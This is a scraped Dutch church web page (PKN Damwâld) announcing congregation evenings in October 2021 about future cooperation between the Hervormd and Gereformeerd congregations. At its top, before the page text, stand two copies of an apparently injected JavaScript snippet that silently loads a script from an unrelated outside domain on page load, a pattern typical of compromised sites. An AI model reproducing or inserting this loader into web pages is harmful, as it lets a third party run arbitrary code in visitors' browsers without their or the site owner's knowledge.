;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Belangrijke gemeenteavonden - PKN Damwâld
4 oktober 2021
19:30 t/m 21:00
Damwâld
Belangrijke gemeenteavonden

Op 05 oktober zullen zowel Hervormd als Gereformeerd een eerste gemeenteavond houden over de toekomst. Tijdens deze avond willen we met u in gesprek over de visie, over de toekomst. Hoe deze eruit komt te zien, gaan we met elkaar invullen. Voor alle duidelijkheid: er is op dit gebied nog geen enkel besluit definitief genomen. Wel staan beide kerkenraden positief over een steeds verdergaande samenwerking met elkaar, de contacten zijn intensief en verlopen in een open sfeer. We bidden ook of God ons de weg wil laten zien die Hij voor Zich ziet in Damwâld.

Locatie: DamwâldDamwâld